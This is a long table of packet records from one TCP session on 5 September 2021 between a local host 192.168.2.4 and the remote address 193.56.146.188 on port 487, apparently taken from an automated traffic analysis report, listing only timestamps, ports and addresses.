Sep 5, 2021 15:50:11.910171986 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910188913 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.910228968 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910268068 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910284042 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.910322905 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910366058 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910382032 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.910419941 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910473108 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910476923 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.910527945 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910563946 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910583973 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.910619974 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910661936 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910681963 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.910715103 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910756111 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910785913 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.910808086 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910861015 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910864115 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.910916090 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910953999 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910972118 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.911009073 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911051035 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911070108 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.911104918 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911163092 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.911192894 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911235094 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911271095 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911302090 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.911335945 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911375999 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911396980 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.911427975 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911470890 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911489964 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.911526918 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911566019 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911585093 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.911621094 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911660910 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911675930 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.911721945 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911762953 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911778927 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.911818027 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911856890 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911874056 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.911912918 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.911974907 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.950855017 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.950912952 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.950989008 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.981411934 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.981467009 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.981502056 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.981549978 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.981554031 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.981610060 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.981620073 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.981664896 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.981703997 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.981723070 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.981758118 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.981807947 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.981817007 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.981863022 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.981901884 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.981920004 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.981956959 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.981997967 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982013941 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.982052088 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982093096 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982111931 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.982147932 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982201099 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982203960 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.982254028 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982291937 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982312918 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.982347012 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982387066 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982403040 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.982440948 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982481956 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982500076 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.982537031 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982588053 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982594967 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.982641935 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982680082 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982702971 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.982733965 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982774973 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982795000 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.982829094 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982868910 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982887030 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.982922077 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982973099 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.982978106 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.983027935 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983064890 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983081102 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.983143091 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983197927 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983197927 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.983249903 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983285904 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983305931 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.983341932 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983382940 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983402014 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.983443975 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983484983 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983500004 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.983537912 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983577967 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983593941 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.983633041 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983669043 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983688116 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.983725071 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983766079 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983783960 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.983825922 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983867884 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983885050 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.983922005 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983961105 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.983978033 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.984015942 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.984055042 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.984070063 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.984111071 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.984149933 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.984165907 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.984210014 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.984308958 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.985610962 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.985657930 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.985693932 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.985735893 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.985740900 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.985790968 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.985811949 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.985845089 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.985887051 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.985912085 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.985939980 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.985990047 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986010075 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.986047983 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986088037 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986112118 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.986141920 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986182928 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986211061 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.986234903 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986277103 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986310005 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.986326933 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986386061 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.986387014 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986444950 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986484051 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986511946 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.986537933 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986579895 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986598969 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.986633062 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986674070 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986701012 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.986728907 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986780882 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986788988 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.986835957 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986872911 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986897945 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.986926079 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.986968994 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987006903 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.987013102 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987061024 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987078905 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.987134933 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987185955 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987202883 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.987246037 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987287998 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987310886 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.987341881 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987386942 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987410069 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.987443924 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987483025 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987514973 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.987535954 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987579107 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987595081 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.987639904 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987680912 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987716913 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987755060 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987775087 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.987799883 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.987809896 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987853050 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987869024 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.987909079 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987947941 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.987965107 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.988008022 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.988054037 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.988065958 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.988106966 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.988146067 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.988163948 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.988200903 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.988240004 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.988255024 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.988293886 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.988334894 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.988351107 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.988396883 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.988439083 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.988455057 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.988492012 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.988550901 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.020390034 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.020452976 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.020490885 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.020534039 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.058096886 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058154106 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058192015 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058229923 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058250904 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.058265924 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058304071 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.058314085 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058358908 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058389902 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.058394909 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058433056 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058442116 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.058471918 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058497906 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.058509111 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058548927 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058574915 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.058585882 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058633089 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058669090 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.058675051 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058712006 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058738947 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.058749914 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058787107 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058811903 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.058823109 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058860064 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058881998 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.058896065 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058943033 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.058955908 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.058984995 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059020996 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059034109 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.059057951 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059096098 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059112072 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.059165001 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059201002 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059241056 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059281111 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059326887 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059370041 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059406996 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059417963 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.059444904 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059482098 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059484005 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.059519053 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059555054 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059556007 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.059592009 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059613943 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.059638977 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059681892 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059693098 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.059717894 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059755087 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059766054 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.059792995 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059829950 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059847116 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.059868097 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059905052 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059927940 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.059952021 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.059993029 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060003042 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.060029030 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060065985 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060080051 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.060102940 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060138941 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060151100 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.060175896 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060214996 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060230017 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.060261965 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060303926 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060317039 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.060357094 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060410976 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060442924 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.060461998 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060513020 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060513973 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.060564995 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060616016 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:12.060617924 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060677052 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060729980 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:12.060733080 CEST	49723	487	192.168.2.4	193.56.146.188
